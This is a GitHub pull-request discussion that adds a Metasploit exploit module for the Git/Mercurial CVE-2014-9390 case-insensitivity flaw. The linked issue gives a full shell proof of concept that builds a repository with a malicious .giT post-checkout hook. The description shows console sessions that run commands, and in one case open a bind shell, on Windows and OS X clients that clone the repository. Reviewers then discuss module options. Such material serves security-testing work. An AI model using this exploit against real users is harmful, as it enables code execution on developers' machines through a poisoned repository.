### PR TITLE
Add module for Git/Mercurial CVE-2014-9390

### LINKED ISSUE #4435: Add coverage for git case-insensitive vulnerability (CVE-2014-9390)
```
cd /tmp
REPO=`mktemp -d`
git init $REPO
cd $REPO
mkdir -p .giT/hooks
echo -ne "#\!/bin/sh\r\nid > /tmp/id" > .giT/hooks/post-checkout
chmod 755 .giT/hooks/post-checkout
git add .
git commit -m "test" -a
git update-server-info
ruby -run -e httpd -- -p 8080  $REPO/.git
```

Then clone http://yourhost:8080:

```
Administrator@win7-git ~
$ rm -f /tmp/id && rm -Rf bad && /cygdrive/c/Program\ Files\ \(x86\)/Git/bin/git clone http://localhost:8080/ bad && cat /tmp/id
Cloning into 'bad'...
uid=500(Administrator) gid=544(Administrators) groups=544(Administrators)
```

### PR DESCRIPTION
**Pull request by jhart-r7**
This doesn't (yet) spawn a shell, but will execute commands of our choosing when a vulnerable client clones our fake repository and `PAYLOAD` == `cmd/unix/generic`.  In addition to my lack of familiarity with exploit modules, I think that I need to rethink how the malicious repository is constructed in order to spawn shells that metasploit can automatically connect to (`regenerate_payload` seems relevant).

This is still a bit of a work in progress, but I welcome anyone else to assist with this PR in making it complete.

Fixes #4435 and makes progress against #4445.  It does this by:
- Hosting a malicious Git HTTP repository 
- Hosting a malicious, not-yet-working and disabled by default Mercurial HTTP repository
- Linking to both of these repositories from a mock HTML page in the hopes of luring someone in

Example in verbose mode:

```
msf > use exploits/multi/http/git_cve_2014_9390
msf exploit(git_cve_2014_9390) > set PAYLOAD cmd/unix/generic 
PAYLOAD => cmd/unix/generic
msf exploit(git_cve_2014_9390) > set CMD "whoami > /tmp/f.txt"
CMD => whoami > /tmp/f.txt
msf exploit(git_cve_2014_9390) > set VERBOSE true
VERBOSE => true
msf exploit(git_cve_2014_9390) > run
[*] Exploit running as background job.

[*] Malicious Git commit of .GiT/post-checkout is:
[*] author pQ5ATdwpqVi d9tYPfEIzCu <pq5atdwpqvi_d9typfeizcu@ubhni5jll.com> 1193845246 -0100
[*] committer pQ5ATdwpqVi d9tYPfEIzCu <pq5atdwpqvi_d9typfeizcu@ubhni5jll.com> 393843866 -0100
[*] 
[*] Initial commit to open git repository for ubhni5jll.com!
msf exploit(git_cve_2014_9390) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://172.16.10.226:8080/
[*] Server started.
[*] Adding hardcoded uri /git
```

Then on a Windows system that has a vulnerable version from https://github.com/msysgit/msysgit/releases/, I clone the malicious repo and see that `/tmp/f.txt` contains my command output:

```
Administrator@win7-git ~
$ rm -f /tmp/f.txt && rm -Rf bad13 &&  /cygdrive/c/Program\ Files\ \(x86\)/Git/bin/git clone http://localhost:8080/git/ bad13 && cat /tmp/f.txt
Cloning into 'bad13'...
Administrator
```

Similarly on a vulnerable OS X host with git from http://sourceforge.net/projects/git-osx-installer/files/ (now broken), with `set ENCODER generic/none` (because `/bin/sh` seems pretty crippled on my test 10.7 system) and `set PAYLOAD cmd/unix/generic``and``CMD`` as with the Windows example:

```
c107unpatched:tmp admin$ rm -f /tmp/f.txt && rm -Rf git && git clone http://localhost:8080/git && cat /tmp/f.txt 
Cloning into 'git'...
Checking connectivity... done
admin
```

With `set PAYLOAD cmd/unix/bind_perl`:

```
c107unpatched:tmp admin$ lsof -ni tcp:4444
c107unpatched:tmp admin$ rm -Rf git && git clone http://localhost:8080/git
Cloning into 'git'...
Checking connectivity... done
c107unpatched:tmp admin$ lsof -ni tcp:4444
COMMAND   PID  USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
perl5.12 8231 admin    3u  IPv4 0xffffff8006aaca40      0t0  TCP *:krb524 (LISTEN)
c107unpatched:tmp admin$ telnet localhost 4444
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id
uid=501(admin) gid=20(staff) groups=20(staff),401(com.apple.access_screensharing),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),402(com.apple.sharepoint.group.1)
```

On an unaffected Linux host it does nothing, as expected, because the hook file is in a file by a slightly different name:

```
$  rm -Rf git && git clone http://localhost:8080/git && ls -laR git/.**/hooks/post-checkout
Cloning into 'git'...
-rwxrwxr-x 1 jhart jhart 105 Dec 22 11:44 git/.GiT/hooks/post-checkout

```

### CODE REVIEW

File: modules/exploits/multi/http/cve_2014_9390.rb [hunk 1]
```diff
@@ -0,0 +1,378 @@
...
+              'Arch'     => [ARCH_X86, ARCH_X86_64]
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptBool.new('GIT', [true, 'Exploit Git clients', true]),
+        OptBool.new('MERCURIAL', [true, 'Exploit Mercurial clients', false])
```
Comment (todb-r7) [inline modules/exploits/multi/http/cve_2014_9390.rb]: The Mercurial option really shouldn't be present at all; it's just going to build up the hopes of the user. I don't mind the rest of the detail and the call to action to help, but it seems like the Mercurial option doesn't do anything other than frustrate the user when it doesn't work today.

At any rate, the boolean shouldn't be required. I'll fix this upon landing, and be explicit about not enabling it. Something like

```ruby
OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial functionality', false])
```

seems more appropriate today.

Comment (todb-r7) [inline modules/exploits/multi/http/cve_2014_9390.rb]: And really, just moving it to advanced options, too. No need to bug the user about it when it's not prime-time.

Comment (FireFart) [inline modules/exploits/multi/http/cve_2014_9390.rb]: another option would be to work with actions. So you can either attack git OR mercurial

Comment (todb-r7) [inline modules/exploits/multi/http/cve_2014_9390.rb]: Hey if it's possible to fire off both, having both wouldn't be bad. Though it's unusual for a module to exploit different vulns in the same module; can make vuln reporting a little wonky.

**Comment by todb-r7** [comment]
Landing this now so the blog post is a little more relevant. Looks good to me:

````
msf exploit(distcc_exec) > use exploit/multi/http/git_client_command_exec 
msf exploit(git_client_command_exec) > show options

Module options (exploit/multi/http/git_client_command_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   GIT      true             yes       Exploit Git clients
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(git_client_command_exec) > info

       Name: Malicious Git and Mercurial HTTP Server For CVE-2014-9390
     Module: exploit/multi/http/git_client_command_exec
   Platform: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-12-18

Provided by:
  Jon Hart <jon_hart@rapid7.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows Powershell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  GIT      true             yes       Exploit Git clients
  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits CVE-2014-9390, which affects Git (versions less 
  than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions 
  less than 3.2.3) and describes three vulnerabilities. On operating 
  systems which have case-insensitive file systems, like Windows and 
  OS X, Git clients can be convinced to retrieve and overwrite 
  sensitive configuration files in the .git directory which can allow 
  arbitrary code execution if a vulnerable client can be convinced to 
  perform certain actions (for example, a checkout) against a 
  malicious Git repository. A second vulnerability with similar 
  characteristics also exists in both Git and Mercurial clients, on 
  HFS+ file systems (Mac OS X) only, where certain Unicode codepoints 
  are ignorable. The third vulnerability with similar characteristics 
  only affects Mercurial clients on Windows, where Windows "short 
  names" (MS-DOS-compatible 8.3 format) are supported. Today this 
  module only truly supports the first vulnerability (Git clients on 
  case-insensitive file systems) but has the functionality to support 
  the remaining two with a little work.

References:
  http://cvedetails.com/cve/2014-9390/
  https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial
  http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html
  http://article.gmane.org/gmane.linux.kernel/1853266
  https://github.com/blog/1938-vulnerability-announced-update-your-git-clients
  https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
  http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29
  http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e
  http://selenic.com/repo/hg-stable/rev/6dad422ecc5a

msf exploit(git_client_command_exec) > show advanced
[....snip....]
   Name           : MERCURIAL
   Current Setting: false
   Description    : Enable experimental Mercurial support
````

**Pull request merged**